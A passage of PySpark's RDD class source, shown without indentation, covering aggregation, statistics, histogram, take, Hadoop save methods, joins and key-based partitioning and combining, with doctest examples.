zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero
value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
a U and one operation for merging two U's
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
return self.mapPartitions(func).fold(zeroValue, combOp)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
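# Usage sketch (illustrative only, assuming an active SparkContext `sc`):
#   st = sc.parallelize([1.0, 2.0, 3.0, 4.0]).stats()
#   st.count(), st.mean(), st.stdev()   # -> (4, 2.5, ~1.118)
# A single pass builds one StatCounter per partition and merges them, which is
# what mean(), variance(), stdev() and friends below delegate to.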
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) insertion to O(1) per
element (where n = # buckets).
Buckets must be sorted, must not contain any duplicates, and must
have at least two elements.
If `buckets` is a number, it will generate buckets that are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given buckets
as 2, the resulting buckets will be [0,50) [50,100]. buckets must
be at least 1. An exception is raised if the RDD contains infinity;
NaN values are ignored. If the elements in the RDD do not vary
(max == min), a single bucket is always returned.
It will return a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
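# Worked example of the bucket lookup above (illustrative only): with even
# buckets [0, 25, 50] (minv = 0, inc = 25) the value 30 lands in bucket
# int((30 - 0) / 25) = 1, while with uneven buckets [0, 5, 25, 50] the same
# value uses bisect.bisect_right(buckets, 30) - 1 = 2. The final pop/merge
# step folds values equal to maxv into the last (closed) bucket.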
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and using the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first parameter of max is >= 1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p, True)
items += res
partsScanned += numPartsToTry
return items[:num]
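# Illustrative numbers for the scan-size estimate above: asking for num = 100
# items when the first scanned partition yielded 10, the interpolation gives
# int(1.5 * 100 * 1 / 10) - 1 = 14 partitions, which the final
# min(max(14, 1), 4 * partsScanned) cap limits to 4 for the next round; a
# round that yields nothing simply quadruples the partition count instead.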
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all. Note that an RDD
may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
:param path: path to text file
:param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be hash-partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a full outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because the builtin hash of None differs
# across machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
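# Roughly, add_shuffle_key above emits, for each bucket, the packed partition
# id followed by one pickled chunk of (key, value) pairs, e.g. the stream
#   pack_long(0), dumps([(k1, v1), (k3, v3)]), pack_long(1), dumps([(k2, v2)])
# which the JVM-side PairwiseRDD pairs back up into (partition, bytes) records
# before the actual partitioning happens in Java (illustrative sketch only;
# k1, v1, ... are placeholder names).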
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def f(x): return x
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
spill = self._can_spill()
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions)
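# Usage sketch (illustrative only, assuming an active SparkContext `sc`):
# computing a per-key (sum, count) pair, where the value type V is int and the
# result type U is a tuple:
#   rdd = sc.parallelize([("a", 1), ("a", 2), ("b", 5)])
#   rdd.aggregateByKey((0, 0),
#                      lambda acc, v: (acc[0] + v, acc[1] + 1),
#                      lambda a, b: (a[0] + b[0], a[1] + b[1])).collect()
#   # -> [('a', (3, 2)), ('b', (5, 1))]   (ordering may vary)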
def foldByKey(self, zeroValue, func, numPartitions=None):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions)
def _can_spill(self):
return self.ctx._conf.get("spark.shuffle.spill", "True").lower() == "true"
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
